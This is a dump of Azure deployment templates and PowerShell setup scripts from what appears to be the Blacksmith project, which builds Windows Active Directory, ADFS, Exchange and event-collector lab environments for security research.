30 | * [OPTIONAL] Windows [Microsoft Monitoring Agent](https://docs.microsoft.com/en-us/services-hub/health/mma-setup) installed
31 | * It connects to the Log Analytics workspace defined in the template.
32 | * [OPTIONAL] Sysmon
33 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml)
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/nestedtemplates/importPfxCert.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "importPfxCertScript": {
9 | "type": "string"
10 | },
11 | "PfxCertPath": {
12 | "type": "string"
13 | },
14 | "pfxCertPassword": {
15 | "type": "securestring"
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | }
22 | }
23 | },
24 | "resources": [
25 | {
26 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
27 | "type": "Microsoft.Compute/virtualMachines/extensions",
28 | "apiVersion": "2019-12-01",
29 | "location": "[parameters('location')]",
30 | "properties": {
31 | "publisher": "Microsoft.Powershell",
32 | "type": "DSC",
33 | "typeHandlerVersion": "2.77",
34 | "autoUpgradeMinorVersion": true,
35 | "settings": {
36 | "wmfVersion": "latest",
37 | "configuration": {
38 | "url": "[parameters('importPfxCertScript')]",
39 | "script": "Import-PfxCert.ps1",
40 | "function": "Import-PfxCert"
41 | },
42 | "configurationArguments": {
43 | "PfxCertPath": "[parameters('PfxCertPath')]"
44 | }
45 | },
46 | "protectedSettings": {
47 | "configurationArguments": {
48 | "PfxCertCreds": {
49 | "UserName": "admin",
50 | "Password": "[parameters('pfxCertPassword')]"
51 | }
52 | }
53 | }
54 | }
55 | }
56 | ]
57 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/nestedtemplates/installADFS.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installADFSScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "federationServiceName": {
15 | "type": "string"
16 | },
17 | "adminUsername": {
18 | "type": "string"
19 | },
20 | "adminPassword": {
21 | "type": "securestring"
22 | },
23 | "adfsUsername": {
24 | "type": "string"
25 | },
26 | "adfsPassword": {
27 | "type": "securestring"
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
39 | "type": "Microsoft.Compute/virtualMachines/extensions",
40 | "apiVersion": "2019-12-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "publisher": "Microsoft.Powershell",
44 | "type": "DSC",
45 | "typeHandlerVersion": "2.77",
46 | "autoUpgradeMinorVersion": true,
47 | "settings": {
48 | "wmfVersion": "latest",
49 | "configuration": {
50 | "url": "[parameters('installADFSScript')]",
51 | "script": "Install-ADFS.ps1",
52 | "function": "Install-ADFS"
53 | },
54 | "configurationArguments": {
55 | "DomainFQDN": "[parameters('DomainFQDN')]",
56 | "FederationServiceName": "[parameters('federationServiceName')]"
57 | }
58 | },
59 | "protectedSettings": {
60 | "configurationArguments": {
61 | "AdminCreds": {
62 | "UserName": "[parameters('adminUsername')]",
63 | "Password": "[parameters('adminPassword')]"
64 | },
65 | "AdfsAdminCreds": {
66 | "UserName": "[parameters('adfsUsername')]",
67 | "Password": "[parameters('adfsPassword')]"
68 | }
69 | }
70 | }
71 | }
72 | }
73 | ]
74 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
3 | [CmdletBinding()]
4 | param (
5 | [Parameter(Mandatory)]
6 | [ValidateSet("DC","ADFS")]
7 | [string]$SetupType
8 |
9 | )
10 | Set-ExecutionPolicy Unrestricted -Force
11 |
12 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
13 |
14 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
15 | Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
16 |
17 | Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
18 | Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
19 | Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
20 | Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0
21 |
22 | if ($SetupType -eq 'DC')
23 | {
24 | Install-Module -Name xDnsServer -RequiredVersion 2.0.0
25 | Install-Module -Name xSmbShare -Force
26 | Install-Module -Name MSOnline -Force
27 | Install-Module -Name AzureAD -Force
28 | Install-Module -Name ActiveDirectoryCSDsc -RequiredVersion 5.0.0
29 | Install-Module -Name CertificateDsc -RequiredVersion 5.1.0
30 | }
31 | elseif ($SetupType -eq 'ADFS')
32 | {
33 | Install-Module -Name AdfsDsc -RequiredVersion 1.1.0
34 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param (
6 | [Parameter(Mandatory)]
7 | [ValidateSet("DC","ADFS")]
8 | [string]$SetupType,
9 |
10 | [Parameter(Mandatory)]
11 | [ValidateSet('TrustedSigned','SelfSigned')]
12 | [string]$CertificateType,
13 |
14 | [Parameter(Mandatory=$false)]
15 | [string]$PfxCertName
16 | )
17 |
18 | # Install DSC Modules
19 | & .\Install-DSC-Modules.ps1 -SetupType $SetupType
20 |
21 | if ($CertificateType -eq 'TrustedSigned')
22 | {
23 | # Move trusted CA signed SSL certificate
24 | Move-Item $PfxCertName C:\ProgramData\
25 | }
26 |
27 | # Custom Settings applied
28 | & .\Prepare-Box.ps1
29 |
30 | # Additional configs
31 | & .\Disarm-Box.ps1
32 |
33 | # Additional Firewall rules
34 | & .\Disarm-Firewall.ps1
35 |
36 | # Enable PSRemoting
37 | & .\Configure-PSRemoting.ps1
38 |
39 | # Windows Security Audit Categories
40 | if ($SetupType -eq 'DC')
41 | {
42 | & .\Enable-WinAuditCategories.ps1 -SetDC
43 | }
44 | else
45 | {
46 | & .\Enable-WinAuditCategories.ps1
47 | }
48 |
49 | # PowerShell Logging
50 | & .\Enable-PowerShell-Logging.ps1
51 |
52 | # Set SACLs
53 | & .\Set-SACLs.ps1
54 |
55 | # Set Wallpaper
56 | & .\Set-WallPaper.ps1
57 |
58 | # Add custom domain to intranet
59 | <#
60 | $IntranetDomainSite = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\blacksmith.local'
61 | if (-not (Test-Path -Path $IntranetDomainSite))
62 | {
63 | $null = New-Item -Path $IntranetDomainSite -Force
64 | }
65 |
66 | Set-ItemProperty -Path $IntranetDomainSite -Name http -Value 1 -Type DWord
67 | Set-ItemProperty -Path $IntranetDomainSite -Name https -Value 1 -Type DWord
68 | #>
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/createADForest.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "createADForestScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "adminUsername": {
15 | "type": "string"
16 | },
17 | "adminPassword": {
18 | "type": "securestring"
19 | },
20 | "domainUsers": {
21 | "type": "secureObject"
22 | },
23 | "location": {
24 | "type": "string",
25 | "metadata": {
26 | "description": "Location for all resources."
27 | }
28 | }
29 | },
30 | "resources": [
31 | {
32 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
33 | "type": "Microsoft.Compute/virtualMachines/extensions",
34 | "apiVersion": "2019-12-01",
35 | "location": "[parameters('location')]",
36 | "properties": {
37 | "publisher": "Microsoft.Powershell",
38 | "type": "DSC",
39 | "typeHandlerVersion": "2.77",
40 | "autoUpgradeMinorVersion": true,
41 | "settings": {
42 | "wmfVersion": "latest",
43 | "configuration": {
44 | "url": "[parameters('createADForestScript')]",
45 | "script": "Create-AD.ps1",
46 | "function": "Create-AD"
47 | },
48 | "configurationArguments": {
49 | "DomainFQDN": "[parameters('DomainFQDN')]"
50 | }
51 | },
52 | "protectedSettings": {
53 | "configurationArguments": {
54 | "AdminCreds": {
55 | "UserName": "[parameters('adminUsername')]",
56 | "Password": "[parameters('adminPassword')]"
57 | },
58 | "DomainUsers": "[parameters('domainUsers').array]"
59 | }
60 | }
61 | }
62 | }
63 | ]
64 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "minLength": 1,
8 | "metadata": {
9 | "description": "Name of the windows machine to run scripts on"
10 | }
11 | },
12 | "extensionName": {
13 | "type": "string"
14 | },
15 | "fileUris": {
16 | "type": "array"
17 | },
18 | "commandToExecute": {
19 | "type": "string"
20 | },
21 | "location": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Location for all resources."
25 | }
26 | }
27 | },
28 | "resources": [
29 | {
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2016-08-30",
32 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
33 | "location": "[parameters('location')]",
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/installMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installMXScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "domainController": {
15 | "type": "string"
16 | },
17 | "mxsRelease": {
18 | "type": "string"
19 | },
20 | "mxsISODirectory": {
21 | "type": "string"
22 | },
23 | "adminUsername": {
24 | "type": "string"
25 | },
26 | "adminPassword": {
27 | "type": "securestring"
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
39 | "type": "Microsoft.Compute/virtualMachines/extensions",
40 | "apiVersion": "2019-12-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "publisher": "Microsoft.Powershell",
44 | "type": "DSC",
45 | "typeHandlerVersion": "2.77",
46 | "autoUpgradeMinorVersion": true,
47 | "settings": {
48 | "wmfVersion": "latest",
49 | "configuration": {
50 | "url": "[parameters('installMXScript')]",
51 | "script": "Install-MSExchange.ps1",
52 | "function": "Install-MSExchange"
53 | },
54 | "configurationArguments": {
55 | "DomainFQDN": "[parameters('domainFQDN')]",
56 | "DomainController": "[parameters('domainController')]",
57 | "MXSRelease": "[parameters('mxsRelease')]",
58 | "MXSISODirectory": "[parameters('mxsISODirectory')]"
59 | }
60 | },
61 | "protectedSettings": {
62 | "configurationArguments": {
63 | "AdminCreds": {
64 | "UserName": "[parameters('adminUsername')]",
65 | "Password": "[parameters('adminPassword')]"
66 | }
67 | }
68 | }
69 | }
70 | }
71 | ]
72 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/postInstallMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "postInstallMXScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "adminUsername": {
15 | "type": "string"
16 | },
17 | "adminPassword": {
18 | "type": "securestring"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2019-12-01",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Powershell",
35 | "type": "DSC",
36 | "typeHandlerVersion": "2.77",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {
39 | "wmfVersion": "latest",
40 | "configuration": {
41 | "url": "[parameters('postInstallMXScript')]",
42 | "script": "PostInstall-MSExchange.ps1",
43 | "function": "PostInstall-MSExchange"
44 | },
45 | "configurationArguments": {
46 | "DomainFQDN": "[parameters('domainFQDN')]"
47 | }
48 | },
49 | "protectedSettings": {
50 | "configurationArguments": {
51 | "AdminCreds": {
52 | "UserName": "[parameters('adminUsername')]",
53 | "Password": "[parameters('adminPassword')]"
54 | }
55 | }
56 | }
57 | }
58 | }
59 | ]
60 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/prepareADMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "prepareADMXScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "domainController": {
15 | "type": "string"
16 | },
17 | "mxsRelease": {
18 | "type": "string"
19 | },
20 | "mxsISODirectory": {
21 | "type": "string"
22 | },
23 | "adminUsername": {
24 | "type": "string"
25 | },
26 | "adminPassword": {
27 | "type": "securestring"
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
39 | "type": "Microsoft.Compute/virtualMachines/extensions",
40 | "apiVersion": "2019-12-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "publisher": "Microsoft.Powershell",
44 | "type": "DSC",
45 | "typeHandlerVersion": "2.77",
46 | "autoUpgradeMinorVersion": true,
47 | "settings": {
48 | "wmfVersion": "latest",
49 | "configuration": {
50 | "url": "[parameters('prepareADMXScript')]",
51 | "script": "PrepareAD-MSExchange.ps1",
52 | "function": "PrepareAD-MSExchange"
53 | },
54 | "configurationArguments": {
55 | "DomainFQDN": "[parameters('domainFQDN')]",
56 | "DomainController": "[parameters('domainController')]",
57 | "MXSRelease": "[parameters('mxsRelease')]",
58 | "MXSISODirectory": "[parameters('mxsISODirectory')]"
59 | }
60 | },
61 | "protectedSettings": {
62 | "configurationArguments": {
63 | "AdminCreds": {
64 | "UserName": "[parameters('adminUsername')]",
65 | "Password": "[parameters('adminPassword')]"
66 | }
67 | }
68 | }
69 | }
70 | }
71 | ]
72 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/prepareMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "prepareMXScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('prepareMXScript')]",
33 | "script": "Prepare-MSExchange.ps1",
34 | "function": "Prepare-MSExchange"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
3 | [CmdletBinding()]
4 | param (
5 | [Parameter(Mandatory)]
6 | [ValidateSet("DC","MXS")]
7 | [string]$SetupType
8 |
9 | )
10 | Set-ExecutionPolicy Unrestricted -Force
11 |
12 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
13 |
14 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
15 | Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
16 |
17 | Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
18 | Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
19 | Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
20 | Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0
21 |
22 | Install-Module -Name xDnsServer -RequiredVersion 2.0.0
23 | Install-Module -Name xSmbShare -Force
24 | Install-Module -Name MSOnline -Force
25 | Install-Module -Name AzureAD -Force
26 |
27 | if ($SetupType -eq 'MXS')
28 | {
29 | Install-Module -Name xExchange -RequiredVersion 1.33.0
30 | Install-Module -Name StorageDsc -RequiredVersion 5.0.1
31 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param (
6 | [Parameter(Mandatory)]
7 | [ValidateSet("DC","MXS")]
8 | [string]$SetupType
9 | )
10 |
11 | # Install DSC Modules
12 | & .\Install-DSC-Modules.ps1 -SetupType $SetupType
13 |
14 | # Custom Settings applied
15 | & .\Prepare-Box.ps1
16 |
17 | # Additional configs
18 | & .\Disarm-Box.ps1
19 |
20 | # Additional Firewall rules
21 | & .\Disarm-Firewall.ps1
22 |
23 | # Enable PSRemoting
24 | & .\Configure-PSRemoting.ps1
25 |
26 | # Windows Security Audit Categories
27 | if ($SetupType -eq 'DC')
28 | {
29 | & .\Enable-WinAuditCategories.ps1 -SetDC
30 | }
31 | else
32 | {
33 | & .\Enable-WinAuditCategories.ps1
34 | }
35 |
36 | # PowerShell Logging
37 | & .\Enable-PowerShell-Logging.ps1
38 |
39 | # Set SACLs
40 | & .\Set-SACLs.ps1
41 |
42 | # Set Wallpaper
43 | & .\Set-WallPaper.ps1
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Windows Server (Domain Controller - Active Directory) + Windows Event Collector (WEC)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-WEC%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-WEC%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/nestedtemplates/createADForest.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "createADForestScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "adminUsername": {
15 | "type": "string"
16 | },
17 | "adminPassword": {
18 | "type": "securestring"
19 | },
20 | "domainUsers": {
21 | "type": "secureObject"
22 | },
23 | "location": {
24 | "type": "string",
25 | "metadata": {
26 | "description": "Location for all resources."
27 | }
28 | }
29 | },
30 | "resources": [
31 | {
32 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
33 | "type": "Microsoft.Compute/virtualMachines/extensions",
34 | "apiVersion": "2019-12-01",
35 | "location": "[parameters('location')]",
36 | "properties": {
37 | "publisher": "Microsoft.Powershell",
38 | "type": "DSC",
39 | "typeHandlerVersion": "2.77",
40 | "autoUpgradeMinorVersion": true,
41 | "settings": {
42 | "wmfVersion": "latest",
43 | "configuration": {
44 | "url": "[parameters('createADForestScript')]",
45 | "script": "Create-AD.ps1",
46 | "function": "Create-AD"
47 | },
48 | "configurationArguments": {
49 | "DomainFQDN": "[parameters('DomainFQDN')]"
50 | }
51 | },
52 | "protectedSettings": {
53 | "configurationArguments": {
54 | "AdminCreds": {
55 | "UserName": "[parameters('adminUsername')]",
56 | "Password": "[parameters('adminPassword')]"
57 | },
58 | "DomainUsers": "[parameters('domainUsers').array]"
59 | }
60 | }
61 | }
62 | }
63 | ]
64 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the Windows virtual machine"
9 | }
10 | },
11 | "extensionName": {
12 | "type": "string"
13 | },
14 | "fileUris": {
15 | "type": "array"
16 | },
17 | "commandToExecute": {
18 | "type": "string"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "type": "Microsoft.Compute/virtualMachines/extensions",
30 | "apiVersion": "2021-07-01",
31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Compute",
35 | "type": "CustomScriptExtension",
36 | "typeHandlerVersion": "1.8",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {
39 | "fileUris": "[parameters('fileUris')]",
40 | "commandToExecute": "[parameters('commandToExecute')]"
41 | }
42 | }
43 | }
44 | ]
45 | }
46 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/nestedtemplates/customScriptExtensionArray.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to join to a domain"
9 | }
10 | },
11 | "fileUris": {
12 | "type": "array"
13 | },
14 | "commandToExecute": {
15 | "type": "string"
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | }
22 | }
23 | },
24 | "resources": [
25 | {
26 | "type": "Microsoft.Compute/virtualMachines/extensions",
27 | "apiVersion": "2021-07-01",
28 | "name": "[concat(parameters('virtualMachines')[copyIndex('CustomScriptCopy')].vmname, '/', parameters('virtualMachines')[copyIndex('CustomScriptCopy')].extensionName)]",
29 | "location": "[parameters('location')]",
30 | "copy": {
31 | "name": "CustomScriptCopy",
32 | "count": "[length(parameters('virtualMachines'))]"
33 | },
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
47 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
3 | [CmdletBinding()]
4 | param (
5 | [Parameter(Mandatory=$false)]
6 | [ValidateSet("DC","WEC")]
7 | [string]$SetupType
8 |
9 | )
10 | Set-ExecutionPolicy Unrestricted -Force
11 |
12 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
13 |
14 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
15 | Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
16 |
17 | Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
18 | Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
19 | Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
20 | Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0
21 |
22 | if ($SetupType -eq 'DC')
23 | {
24 | Install-Module -Name xDnsServer -RequiredVersion 2.0.0
25 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param (
6 | [Parameter(Mandatory=$false)]
7 | [ValidateSet("DC","WEC")]
8 | [string]$SetupType
9 | )
10 |
11 | # Install DSC Modules
12 | & .\Install-DSC-Modules.ps1 -SetupType $SetupType
13 |
14 | # Custom Settings applied
15 | & .\Prepare-Box.ps1
16 |
17 | # Additional configs
18 | & .\Disarm-Box.ps1
19 |
20 | # Additional Firewall rules
21 | & .\Disarm-Firewall.ps1
22 |
23 | # Enable PSRemoting
24 | & .\Configure-PSRemoting.ps1
25 |
26 | # Windows Security Audit Categories
27 | if ($SetupType -eq 'DC')
28 | {
29 | & .\Enable-WinAuditCategories.ps1 -SetDC
30 | }
31 | else
32 | {
33 | & .\Enable-WinAuditCategories.ps1
34 | }
35 |
36 | # PowerShell Logging
37 | & .\Enable-PowerShell-Logging.ps1
38 |
39 | # Set SACLs
40 | & .\Set-SACLs.ps1
41 |
42 | # Set Wallpaper
43 | & .\Set-WallPaper.ps1
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Windows Server (Domain Controller - Active Directory)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/createADForest.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "createADForestScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "domainNetbiosName": {
15 | "type": "string"
16 | },
17 | "adminUsername": {
18 | "type": "string"
19 | },
20 | "adminPassword": {
21 | "type": "securestring"
22 | },
23 | "domainUsers": {
24 | "type": "secureObject"
25 | },
26 | "location": {
27 | "type": "string",
28 | "metadata": {
29 | "description": "Location for all resources."
30 | }
31 | }
32 | },
33 | "resources": [
34 | {
35 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
36 | "type": "Microsoft.Compute/virtualMachines/extensions",
37 | "apiVersion": "2019-12-01",
38 | "location": "[parameters('location')]",
39 | "properties": {
40 | "publisher": "Microsoft.Powershell",
41 | "type": "DSC",
42 | "typeHandlerVersion": "2.77",
43 | "autoUpgradeMinorVersion": true,
44 | "settings": {
45 | "wmfVersion": "latest",
46 | "configuration": {
47 | "url": "[parameters('createADForestScript')]",
48 | "script": "Create-AD.ps1",
49 | "function": "Create-AD"
50 | },
51 | "configurationArguments": {
52 | "DomainFQDN": "[parameters('DomainFQDN')]",
53 | "DomainNetbiosName": "[parameters('domainNetbiosName')]"
54 | }
55 | },
56 | "protectedSettings": {
57 | "configurationArguments": {
58 | "AdminCreds": {
59 | "UserName": "[parameters('adminUsername')]",
60 | "Password": "[parameters('adminPassword')]"
61 | },
62 | "DomainUsers": "[parameters('domainUsers').array]"
63 | }
64 | }
65 | }
66 | }
67 | ]
68 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/enableTLS12.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "enableTLS12Script": {
